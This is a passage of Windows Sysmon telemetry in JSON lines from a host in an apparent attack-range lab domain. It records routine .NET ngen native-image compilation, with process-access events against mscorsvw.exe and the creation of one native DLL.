C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.668","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010AB5E1200}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.668\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010AB5E1200}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.668","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010AB5E1200}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010AB5E1200}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010AB5E1200}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.715\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04DB-5F25-0000-0010F48E1100}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.715","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04DB-5F25-0000-0010F48E1100}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.715\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04DB-5F25-0000-0010F48E1100}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.715","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04DB-5F25-0000-0010F48E1100}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-001059621200}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-001059621200}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:27.809\r\nProcessGuid: {A837DB8D-04FB-5F25-0000-001059621200}\r\nProcessId: 2756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac4-0\\System.Xaml.Hosting.dll\r\nCreationUtcTime: 2020-08-01 06:00:27.809","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:27.809","ProcessGuid":"{A837DB8D-04FB-5F25-0000-001059621200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac4-0\\System.Xaml.Hosting.dll","CreationUtcTime":"2020-08-01 06:00:27.809","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.840\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-001091671200}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.840","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-001091671200}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.840\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-001091671200}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.840","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-001091671200}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
